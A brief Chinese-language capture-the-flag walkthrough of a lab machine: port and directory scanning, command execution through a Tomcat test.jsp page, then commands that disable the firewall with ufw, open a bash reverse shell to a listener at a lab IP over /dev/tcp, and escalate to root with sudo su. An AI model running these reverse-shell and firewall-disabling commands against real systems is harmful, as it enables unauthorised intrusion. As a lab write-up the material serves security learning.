一、信息收集
1、主机发现
启动后在页面会显示ip地址
2、端口扫描
nmap 192.168.236.157 -p- -A
3、目录扫描
dirsearch -u http://192.168.236.157:8080
二、漏洞探测
步骤一:访问8080端口,发现是Tomcat主页
步骤二:拼接访问扫描出来的 /test.jsp 文件,得到一个输入框
步骤三:根据提示信息,输入 ls -l /tmp ,可以执行
步骤四:输入 ls -l /home ,发现 bill 用户
步骤五:输入 ps -aux 查看进程,发现 sshd 服务正在使用中,nmap刚刚没有扫描出 ssh 的端口,可能被防火墙限制
三、GetShell
尝试关闭防火墙,反弹shell,同时本地开启监听
ssh bill@localhost sudo ufw disable
ssh bill@localhost bash -i >& /dev/tcp/192.168.236.137/4444 0>&1
四、提权
步骤一:sudo -l
步骤二:直接 sudo su ,成功提权
步骤三:找找flag